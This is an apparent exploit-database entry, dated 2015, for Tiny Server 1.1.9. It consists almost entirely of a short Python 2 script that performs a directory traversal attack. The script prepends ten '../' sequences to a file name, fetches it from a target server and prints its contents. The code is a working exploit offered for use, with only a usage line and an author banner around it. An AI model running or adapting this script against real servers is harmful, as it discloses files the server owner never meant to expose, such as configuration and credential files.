Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit



EKU-ID: 4592 CVE: OSVDB-ID:
Author: Yahya Tanisik Published: 2015-02-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# -*- coding: utf-8 -*-
import urllib2
import sys
#Tiny Server v1.1.9 Arbitrary File Disclosure Exploit
  
def banner():
        print "\033[1m\033[92mTiny Server v1.1.9 Arbitrary File Disclosure Exploit"
        print "Exploit Write by Yahya Tanisik"
        print "Contact : yahyatnsk@gmail.com"
  
if(len(sys.argv)==3):
        banner()
        print "\n"
        aragazi = '../'*10
        baglanti = urllib2.Request(str(sys.argv[1])+"/"+aragazi+""+str(sys.argv[2]))
        cikti = urllib2.urlopen(baglanti)
        print ('#'*30)+" File content "+('#'*30)
        print cikti.read()
else:
        banner()
        print "\033[91mUsage python exploit.py http://127.0.0.1:80 flag.txt"